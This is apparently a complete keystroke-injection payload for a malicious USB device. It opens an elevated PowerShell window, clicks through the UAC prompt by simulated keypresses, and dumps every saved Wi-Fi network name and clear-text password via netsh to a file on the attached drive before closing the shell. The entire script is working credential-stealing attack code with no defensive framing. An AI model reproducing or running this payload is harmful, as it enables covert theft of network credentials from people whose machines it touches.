layout('us');
delay(500);
press("GUI r");
delay(200);
type("powershell.exe");
press("CTRL SHIFT ENTER");
delay(3500);
press("LEFT");
delay(250);
press("ENTER");
delay(750)
press("ENTER");
delay(2500);
type('$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()}$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$o+="SSID: $ssid`nPassword: $pass`n`n"}}}$a++;};');
press("ENTER");
type('echo $o | Out-File -FilePath E:\\wifi.txt');
press("ENTER");
type('exit');
press("ENTER");
